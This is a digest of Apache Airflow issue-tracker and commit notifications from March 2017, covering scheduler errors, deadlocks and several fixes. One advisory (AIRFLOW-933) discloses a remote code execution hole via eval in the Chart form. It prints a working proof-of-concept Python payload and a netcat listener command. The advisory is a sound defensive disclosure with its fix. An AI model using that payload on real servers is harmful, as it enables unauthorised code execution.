> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution), I 
> started seeing the error stack below again and again in the scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 

[jira] [Commented] (AIRFLOW-962) Dag runs are deadlocked for DAG scheduled for @once

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-962?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924835#comment-15924835
 ] 

Bolke de Bruin commented on AIRFLOW-962:


Please test on 1.8.0 (rc5).

> Dag runs are deadlocked for DAG scheduled for @once
> ---
>
> Key: AIRFLOW-962
> URL: https://issues.apache.org/jira/browse/AIRFLOW-962
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
> Environment: airflow v1.7.1.3 installed on an AWS cluster node
> with celery executor, rabbitMQ service and mysql for the meta store
>Reporter: Sheikh Aslam Ahmed
>
> We read MySQL table rows from a Python script and create DAGs out of them; any 
> change in a row leads to a change in the DAG.
> We schedule each DAG based on inputs (like @once, hourly, daily, etc.).
> For the last few days, hourly and other scheduled profiles have run properly, 
> but a profile with schedule @once failed (in the web UI no task got picked up 
> from the DAG). The error in the logs shows the message ' {jobs.py:538} ERROR - 
> Dag runs are deadlocked for DAG: dagname'.
> After that, if we trigger a manual run of the same DAG from the web UI, it 
> runs and completes successfully.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-965) ONE_SUCCESS TriggerRule is triggering with only skips

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-965?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-965.

Resolution: Not A Bug

> ONE_SUCCESS TriggerRule is triggering with only skips
> -
>
> Key: AIRFLOW-965
> URL: https://issues.apache.org/jira/browse/AIRFLOW-965
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: cli, DagRun, webserver
>Affects Versions: Airflow 1.8
> Environment: docker-compose using docker-compose-LocalExecutor.yml  
> on this fork/branch 
> https://github.com/fdm1/docker-airflow/tree/v1-8-not-skipping
>Reporter: Daniel Gies
>
> This commit 
> https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;a=commitdiff;h=1fdcf24
> is causing tasks with the ONE_SUCCESS trigger rule to trigger if any of their 
> upstream dependencies are skipped.
> This changes the previous behavior, where ONE_SUCCESS would only fire if there 
> was, you know, a success.
> It is no longer possible to use ONE_SUCCESS as a wait()-like mechanism to 
> collect branches of the DAG.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-965) ONE_SUCCESS TriggerRule is triggering with only skips

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-965?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924831#comment-15924831
 ] 

Bolke de Bruin commented on AIRFLOW-965:


This is a change in behaviour (which might need to be updated again). Use 
ALL_SUCCESS to get the same behaviour as before.

> ONE_SUCCESS TriggerRule is triggering with only skips
> -
>
> Key: AIRFLOW-965
> URL: https://issues.apache.org/jira/browse/AIRFLOW-965
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: cli, DagRun, webserver
>Affects Versions: Airflow 1.8
> Environment: docker-compose using docker-compose-LocalExecutor.yml  
> on this fork/branch 
> https://github.com/fdm1/docker-airflow/tree/v1-8-not-skipping
>Reporter: Daniel Gies
>
> This commit 
> https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;a=commitdiff;h=1fdcf24
> is causing tasks with the ONE_SUCCESS trigger rule to trigger if any of their 
> upstream dependencies are skipped.
> This changes the previous behavior, where ONE_SUCCESS would only fire if there 
> was, you know, a success.
> It is no longer possible to use ONE_SUCCESS as a wait()-like mechanism to 
> collect branches of the DAG.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-972) Airflow kills subprocesses created by task instances

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-972?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924825#comment-15924825
 ] 

Bolke de Bruin commented on AIRFLOW-972:


Please test with airflow 1.8.0 (rc5)

> Airflow kills subprocesses created by task instances
> 
>
> Key: AIRFLOW-972
> URL: https://issues.apache.org/jira/browse/AIRFLOW-972
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: scheduler
>Affects Versions: Airflow 1.7.1
>Reporter: Richard Moorhead
>Priority: Minor
>
> We have a task which creates multiple subprocesses via 
> [joblib|https://pythonhosted.org/joblib/parallel.html]; we're noticing that 
> airflow seems to kill the subprocesses prior to their completion. Is there 
> any way around this behavior?



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-976) Mark success running task causes it to fail

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-976?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-976:
---
Affects Version/s: 1.8.0

> Mark success running task causes it to fail
> ---
>
> Key: AIRFLOW-976
> URL: https://issues.apache.org/jira/browse/AIRFLOW-976
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: 1.8.0
>Reporter: Dan Davydov
>Assignee: Alex Guziel
> Fix For: 1.8.1
>
>
> Marking success on a running task in the UI causes it to fail.
> Expected Behavior:
> Task instance is killed and marked as successful
> Actual Behavior:
> Task instance is killed and marked as failed
> [~saguziel] [~bolke]



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-976) Mark success running task causes it to fail

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-976?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin updated AIRFLOW-976:
---
Fix Version/s: 1.8.1

> Mark success running task causes it to fail
> ---
>
> Key: AIRFLOW-976
> URL: https://issues.apache.org/jira/browse/AIRFLOW-976
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: 1.8.0
>Reporter: Dan Davydov
>Assignee: Alex Guziel
> Fix For: 1.8.1
>
>
> Marking success on a running task in the UI causes it to fail.
> Expected Behavior:
> Task instance is killed and marked as successful
> Actual Behavior:
> Task instance is killed and marked as failed
> [~saguziel] [~bolke]



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-977) Deadlocked DAG run with MySQL v5.7.17

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-977?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924822#comment-15924822
 ] 

Bolke de Bruin commented on AIRFLOW-977:


Please test with Airflow 1.8.0 (rc5), many fixes in this area.

> Deadlocked DAG run with MySQL v5.7.17
> -
>
> Key: AIRFLOW-977
> URL: https://issues.apache.org/jira/browse/AIRFLOW-977
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: DagRun
>Affects Versions: Airflow 1.7.1
> Environment: macOS Sierra 10.12.3, MySQL 5.7.17, Airflow 1.7.1.3
>Reporter: Michael Kotliar
>  Labels: easyfix
>
> When using MySQL 5.7.17, all DATETIME values are saved to the DB with 
> rounding, not truncation as in MySQL 5.5 before. This causes the is_queueable 
> check for a task to fail when its execution date was saved to the DB rounded 
> towards the bigger value, which makes the execution date greater than 
> datetime.now(). If all of the tasks in a DAG fail this check, the DAG 
> becomes deadlocked.
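
A small illustration of the failure mode (the timestamps are made up):

{code}
from datetime import datetime

now    = datetime(2017, 3, 14, 12, 0, 0, 900000)  # 0.9 s of microseconds
stored = datetime(2017, 3, 14, 12, 0, 1)          # MySQL 5.7 rounds up on save

# The stored execution_date now lies in the future, so an
# is_queueable-style comparison against datetime.now() fails:
assert stored > now
{code}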



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-967) ldap3 has incompatibilities with py2

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-967?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-967.

   Resolution: Fixed
Fix Version/s: 1.8.0

> ldap3 has incompatibilities with py2
> 
>
> Key: AIRFLOW-967
> URL: https://issues.apache.org/jira/browse/AIRFLOW-967
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
>Assignee: Bolke de Bruin
> Fix For: 1.8.0
>
>
> Python 2 gets a newstr type that doesn't work with ldap3.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Resolved] (AIRFLOW-974) airflow.util.file mkdir has a race condition

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-974?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin resolved AIRFLOW-974.

   Resolution: Fixed
 Assignee: Bolke de Bruin
Fix Version/s: 1.8.1

> airflow.util.file mkdir has a race condition
> 
>
> Key: AIRFLOW-974
> URL: https://issues.apache.org/jira/browse/AIRFLOW-974
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Bolke de Bruin
>Assignee: Bolke de Bruin
> Fix For: 1.8.1
>
>
> mkdir has a race condition:
> it checks for the existence of a directory and afterwards tries to create 
> it. If another process creates that directory between the check and the 
> creation, the function errors.
> [~aoen]
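
A sketch of the usual fix for a check-then-create race: attempt the creation unconditionally and tolerate EEXIST, rather than testing for existence first.

{code}
import errno
import os

def mkdirs(path, mode=0o755):
    try:
        os.makedirs(path, mode)
    except OSError as e:
        # Another process won the race; that is fine as long as a
        # directory now exists at the path.
        if e.errno != errno.EEXIST or not os.path.isdir(path):
            raise
{code}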



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-980) IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique constraint "dag_run_dag_id_key" on sample DAGs

2017-03-14 Thread Bolke de Bruin (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-980?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924815#comment-15924815
 ] 

Bolke de Bruin commented on AIRFLOW-980:


Please test with Airflow 1.8.0 (rc5)

> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key" on sample DAGs
> 
>
> Key: AIRFLOW-980
> URL: https://issues.apache.org/jira/browse/AIRFLOW-980
> Project: Apache Airflow
>  Issue Type: Bug
>Affects Versions: Airflow 1.7.1.3
> Environment: Local Executor
> postgresql+psycopg2 database backend
>Reporter: Ruslan Dautkhanov
>
> Fresh Airflow install using pip.
> Only sample DAGs are installed.
> LocalExecutor (4 workers).
> Most of the parameters are at defaults.
> Turned On all of the sample DAGs (14 of them).
> After some execution (a lot of DAGs had at least one successful execution), I 
> started seeing the error stack below again and again in the scheduler log.
> {noformat}
> IntegrityError: (psycopg2.IntegrityError) duplicate key value violates unique 
> constraint "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': u'running', 'conf': None, 'start_date': 
> datetime.datetime(2017, 3, 14, 11, 12, 29, 646995), 'dag_id': 'example_xcom'}]
> Process Process-152:
> Traceback (most recent call last):
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 258, in _bootstrap
> self.run()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/multiprocessing/process.py", 
> line 114, in run
> self._target(*self._args, **self._kwargs)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/jobs.py", 
> line 664, in _do_dags
> dag = dagbag.get_dag(dag.dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 188, in get_dag
> orm_dag = DagModel.get_current(root_dag_id)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/airflow/models.py",
>  line 2320, in get_current
> obj = session.query(cls).filter(cls.dag_id == dag_id).first()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2634, in first
> ret = list(self[0:1])
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2457, in __getitem__
> return list(res)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2736, in __iter__
> return self._execute_and_instances(context)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2749, in _execute_and_instances
> close_with_result=True)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/query.py",
>  line 2740, in _connection_from_session
> **kw)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 893, in connection
> execution_options=execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 898, in _connection_for_bind
> engine, execution_options)
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 313, in _connection_for_bind
> self._assert_active()
>   File 
> "/opt/cloudera/parcels/Anaconda/lib/python2.7/site-packages/sqlalchemy/orm/session.py",
>  line 214, in _assert_active
> % self._rollback_exception
> InvalidRequestError: This Session's transaction has been rolled back due to a 
> previous exception during flush. To begin a new transaction with this 
> Session, first issue Session.rollback(). Original exception was: 
> (psycopg2.IntegrityError) duplicate key value violates unique constraint 
> "dag_run_dag_id_key"
>  [SQL: 'INSERT INTO dag_run (dag_id, execution_date, start_date, end_date, 
> state, run_id, external_trigger, conf) VALUES (%(dag_id)s, 
> %(execution_date)s, %(start_date)s, %(end_date)s, %(state)s, %(run_id)s, 
> %(external_trigger)s, %(conf)s) RETURNING dag_run.id'] [parameters: 
> {'end_date': None, 'run_id': u'scheduled__2015-01-01T00:00:00', 
> 'execution_date': datetime.datetime(2015, 1, 1, 0, 0), 'external_trigger': 
> False, 'state': 

[jira] [Closed] (AIRFLOW-968) TravisCI builds in master are failing for Python 2.7

2017-03-14 Thread Bolke de Bruin (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-968?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Bolke de Bruin closed AIRFLOW-968.
--
Resolution: Fixed

> TravisCI builds in master are failing for Python 2.7
> 
>
> Key: AIRFLOW-968
> URL: https://issues.apache.org/jira/browse/AIRFLOW-968
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: travis
>Reporter: Adam Bloomston
>Priority: Blocker
>
> Last good build on master: 
> https://travis-ci.org/apache/incubator-airflow/builds/204780659
> First failing build on master: 
> https://travis-ci.org/apache/incubator-airflow/builds/205138766
> Python 3.4 builds seem fine, Python 2.7 builds are failing.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-933) Security - Airflow Use of Eval Allows for Remote Code Execution

2017-03-14 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-933?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924765#comment-15924765
 ] 

ASF subversion and git services commented on AIRFLOW-933:
-

Commit 2bf52ab16960f00cb9a98ba455d5851aabf6305f in incubator-airflow's branch 
refs/heads/master from [~artwr]
[ https://git-wip-us.apache.org/repos/asf?p=incubator-airflow.git;h=2bf52ab ]

[AIRFLOW-933] Replace eval with literal_eval to prevent RCE

Replace eval with a literal eval to help prevent arbitrary code
execution on the webserver host.


> Security - Airflow Use of Eval Allows for Remote Code Execution
> ---
>
> Key: AIRFLOW-933
> URL: https://issues.apache.org/jira/browse/AIRFLOW-933
> Project: Apache Airflow
>  Issue Type: Bug
>Reporter: Rui Wang
>Assignee: Rui Wang
>
> Impact: Any user with the ability to create or edit Charts may execute 
> arbitrary code on the Airflow server.
> Location: The Default Parameters form field sent when saving a Chart, located 
> at /admin/chart/new/
> Description: The Chart functionality allows for the definition of Default 
> Parameters, which are baseline constraints for the values within a chart.
> This data is user-controllable and passed directly to a Python eval, which 
> will execute code:
> {code}
> def label_link(v, c, m, p):
>     try:
>         default_params = eval(m.default_params)
>     except:
>         default_params = {}
>     url = url_for(
>         'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
>         **default_params)
>     return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
> {code}
> Reproduction Steps:
> 1. Configure a local instance of Airflow, and start a local netcat listener 
> with the following shell command: nc -l 1337.
> 2. Access Airflow as a user able to create or edit Charts.
> 3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
> 4. In its Default Parameters field, enter the following example 
> payload:
>   (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read(), 
> None)[1] for __g['urllib'] in [(__import__('urllib.request', __g, 
> __g))]][0])(globals())
> 5. Save the Chart, and observe that the application has made a network 
> request to your listener, indicating that your code has executed.
> Remediation: Use the Python method ast.literal_eval 
> (https://docs.python.org/3/library/ast.html#ast.literal_eval) which safely 
> parses its input, rather than executing it as code.
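
A sketch of the remediation: commit 2bf52ab replaces the eval with literal_eval; the exact exception handling and imports here are assumptions, not the committed diff.

{code}
import ast
from flask import Markup, url_for

def label_link(v, c, m, p):
    try:
        # literal_eval parses Python literals only; it never executes code.
        default_params = ast.literal_eval(m.default_params)
    except (ValueError, SyntaxError):
        default_params = {}
    url = url_for(
        'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
        **default_params)
    return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))
{code}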



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[2/2] incubator-airflow git commit: Merge pull request #2150 from artwr/artwr-fix_another_use_of_eval

2017-03-14 Thread arthur
Merge pull request #2150 from artwr/artwr-fix_another_use_of_eval


Project: http://git-wip-us.apache.org/repos/asf/incubator-airflow/repo
Commit: http://git-wip-us.apache.org/repos/asf/incubator-airflow/commit/c44e2009
Tree: http://git-wip-us.apache.org/repos/asf/incubator-airflow/tree/c44e2009
Diff: http://git-wip-us.apache.org/repos/asf/incubator-airflow/diff/c44e2009

Branch: refs/heads/master
Commit: c44e2009ee625ce4a82c50e585a3c8617d9b4ff8
Parents: ed03bb7 2bf52ab
Author: Arthur Wiedmer 
Authored: Tue Mar 14 11:39:45 2017 -0700
Committer: Arthur Wiedmer 
Committed: Tue Mar 14 11:39:45 2017 -0700

--
 airflow/www/views.py | 8 
 1 file changed, 4 insertions(+), 4 deletions(-)
--




[jira] [Created] (AIRFLOW-981) TreeView date axis shows dates into the future

2017-03-14 Thread Ruslan Dautkhanov (JIRA)
Ruslan Dautkhanov created AIRFLOW-981:
-

 Summary: TreeView date axis shows dates into the future
 Key: AIRFLOW-981
 URL: https://issues.apache.org/jira/browse/AIRFLOW-981
 Project: Apache Airflow
  Issue Type: Bug
  Components: ui, webserver
Affects Versions: Airflow 1.7.1.3
Reporter: Ruslan Dautkhanov
Priority: Critical
 Attachments: Airflow - TreeView-2 weeks in the future.png

Freshly installed Airflow.

The example_twitter_dag Tree View shows a date scale from Mar 13 (yesterday, when 
that job didn't even run) to March 27th and beyond (2+ weeks into the future).

So the tasks below that date scale are totally misaligned with the time dimension.
See the screenshot below.

!Airflow - TreeView-2 weeks in the future.png!



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-797) CLONE - No such transport: sqla when using CeleryExecutor

2017-03-14 Thread Ruslan Dautkhanov (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-797?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15924487#comment-15924487
 ] 

Ruslan Dautkhanov commented on AIRFLOW-797:
---

Is there any workaround for this until that celery/kombu PR is merged?

> CLONE - No such transport: sqla when using CeleryExecutor
> -
>
> Key: AIRFLOW-797
> URL: https://issues.apache.org/jira/browse/AIRFLOW-797
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: celery
>Affects Versions: Airflow 1.7.1.3
>Reporter: Amin Ghadersohi
>Assignee: Amin Ghadersohi
>Priority: Trivial
>
> Cloned https://issues.apache.org/jira/browse/AIRFLOW-749 as it is not fixed. 
> I installed airflow using the regular pip install, then changed my 
> db to postgres for execution using Celery. 
> After changing the executor and installing celery (4.0.2), running the example 
> DAGs gives me the following error:
> ```
> raise KeyError('No such transport: {0}'.format(transport))
> KeyError: u'No such transport: sqla'
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Commented] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)

[ 
https://issues.apache.org/jira/browse/AIRFLOW-979?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=15923829#comment-15923829
 ] 

Chris Sng commented on AIRFLOW-979:
---

Please review my Pull Request #2149:
https://github.com/apache/incubator-airflow/pull/2149

> Add GovTech GDS
> ---
>
> Key: AIRFLOW-979
> URL: https://issues.apache.org/jira/browse/AIRFLOW-979
> Project: Apache Airflow
>  Issue Type: Wish
>  Components: docs
>Reporter: Chris Sng
>Assignee: Chris Sng
>Priority: Trivial
>  Labels: documentation
>
> Add to README.md:
> ```
> 1. [GovTech GDS](https://gds-gov.tech) 
> [[@chrissng](https://github.com/chrissng) & 
> [@datagovsg](https://github.com/datagovsg)]
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-979?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chris Sng updated AIRFLOW-979:
--
Issue Type: Wish  (was: Bug)

> Add GovTech GDS
> ---
>
> Key: AIRFLOW-979
> URL: https://issues.apache.org/jira/browse/AIRFLOW-979
> Project: Apache Airflow
>  Issue Type: Wish
>  Components: docs
>Reporter: Chris Sng
>Assignee: Chris Sng
>Priority: Trivial
>  Labels: documentation
>
> Add to README.md:
> ```
> 1. [GovTech GDS](https://gds-gov.tech) 
> [[@chrissng](https://github.com/chrissng) & 
> [@datagovsg](https://github.com/datagovsg)]
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Updated] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)

 [ 
https://issues.apache.org/jira/browse/AIRFLOW-979?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Chris Sng updated AIRFLOW-979:
--
Description: 
Add to README.md:
```
1. [GovTech GDS](https://gds-gov.tech) 
[[@chrissng](https://github.com/chrissng) & 
[@datagovsg](https://github.com/datagovsg)]
```

  was:
Add to README.md:
```
1. [GovTech GDS](https://gds-gov.tech) 
[[@chrissng](https://github.com/chrissng)]
```


> Add GovTech GDS
> ---
>
> Key: AIRFLOW-979
> URL: https://issues.apache.org/jira/browse/AIRFLOW-979
> Project: Apache Airflow
>  Issue Type: Bug
>  Components: docs
>Reporter: Chris Sng
>Assignee: Chris Sng
>Priority: Trivial
>  Labels: documentation
>
> Add to README.md:
> ```
> 1. [GovTech GDS](https://gds-gov.tech) 
> [[@chrissng](https://github.com/chrissng) & 
> [@datagovsg](https://github.com/datagovsg)]
> ```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)


[jira] [Created] (AIRFLOW-979) Add GovTech GDS

2017-03-14 Thread Chris Sng (JIRA)
Chris Sng created AIRFLOW-979:
-

 Summary: Add GovTech GDS
 Key: AIRFLOW-979
 URL: https://issues.apache.org/jira/browse/AIRFLOW-979
 Project: Apache Airflow
  Issue Type: Bug
  Components: docs
Reporter: Chris Sng
Assignee: Chris Sng
Priority: Trivial


Add to README.md:
```
1. [GovTech GDS](https://gds-gov.tech) 
[[@chrissng](https://github.com/chrissng)]
```



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)